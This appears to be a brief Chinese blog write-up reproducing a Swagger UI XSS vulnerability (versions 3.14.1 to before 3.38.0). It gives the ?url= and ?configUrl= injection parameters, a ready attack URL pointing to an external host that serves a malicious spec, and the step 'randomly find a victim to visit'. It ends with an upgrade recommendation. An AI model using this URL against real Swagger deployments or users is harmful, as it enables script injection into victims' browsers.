swagger xss漏洞复现

扣脚大汉在网络2024-04-27 9:39

swagger xss漏洞复现

文章目录

漏洞介绍

Swagger UI 有一个有趣的功能,允许您提供 API 规范的 URL - 一个 yaml 或 json 文件,将被获取并显示给用户

根本原因非常简单 - 一个过时的库DomPurify

影响版本

XSS 影响的 Swagger UI 版本:>=3.14.1 < 3.38.0

实现原理

利用允许提供json文件的原理访问公网网站进行弹窗

json网站:https://jumpy-floor.surge.sh/test.yaml

拼接方式

?url=https://your_api_spec/spec.yaml

?configUrl=https://your_api_spec/file.json

漏洞复现

随机找一位受害者访问

进行拼接?url=https://jumpy-floor.surge.sh/test.yaml

弹窗

修复建议:

升级到最新

相关推荐
李白你好2 小时前
XSS 漏洞练习靶场,覆盖反射型、存储型、DOM 型、SVG、CSP、框架注入、协议绕过等多种场景
xss
咆哮的黑化肥3 天前
跨站脚本攻击XSS入门(+DVWA、Pikachu靶场练习)
网络安全·xss
给勒布朗上上对抗呀4 天前
XSS实战-Bugku-zombie-10
ctf·xss
Sapphire~4 天前
【前端基础】04-XSS(跨站脚本攻击,Cross-Site Scripting)
前端·xss
QuantumRedGuestk6 天前
FineCMS 存储型 XSS 漏洞分析与防御建议
xss·漏洞复现·finecms靶场
QuantumRedGuestk6 天前
Xss-Labs靶场通关详细教程【文图】
靶场·xss·xss-labs·web渗透
weixin_465790919 天前
FV-SVM:萤火虫算法优化的支持向量机:FA-SVM。 一种模拟萤火虫闪烁行为的启发式优化算法
xss
C_心欲无痕12 天前
网络相关 - XSS跨站脚本攻击与防御
前端·网络·xss
热门推荐
01GitHub 镜像站点022025 Telegram 最新免费社工库机器人(LetsTG可[特殊字符])搭建指南(含 Python 脚本)03OpenCode 入门教程:介绍 · 安装 · 配置第三方 API (如 Claude)04Linux下V2Ray安装配置指南05UV安装并设置国内源06Claude Code Skills 实用使用手册07AI 规范驱动开发“三剑客”深度对比:Spec-Kit、Kiro 与 OpenSpec 实战指南08Labelme从安装到标注:零基础完整指南09安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)10BongoCat - 跨平台键盘猫动画工具